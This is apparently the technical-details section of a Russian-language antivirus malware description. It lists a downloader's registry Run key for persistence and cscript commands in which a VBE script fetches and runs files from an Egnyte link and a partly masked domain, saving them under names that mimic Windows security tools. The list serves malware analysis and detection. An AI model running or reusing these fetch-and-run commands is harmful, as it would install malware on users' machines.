Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'USBDM0N' = '%APPDATA%\abh3lfauqhmh.exe'
- '<SYSTEM32>\cscript.exe' %APPDATA%\\win64s.vbe https://osinformatica.egnyte.com/dd/IOBRMPxpBi %APPDATA%\abh3lfauqhmh.exe Exec
- '<SYSTEM32>\cscript.exe' %APPDATA%\\win64s.vbe http://vb#.###xadorfree.com/casa1/killa.z %APPDATA%\ProtectionManagement_Uninstall.exename Down
- '<SYSTEM32>\cscript.exe' %APPDATA%\\win64s.vbe http://vb#.###xadorfree.com/casa1/keyla.z %APPDATA%\ConfigSecurityPolicy.exename Down
- %APPDATA%\win64s.vbe
- %APPDATA%\win64s.vbe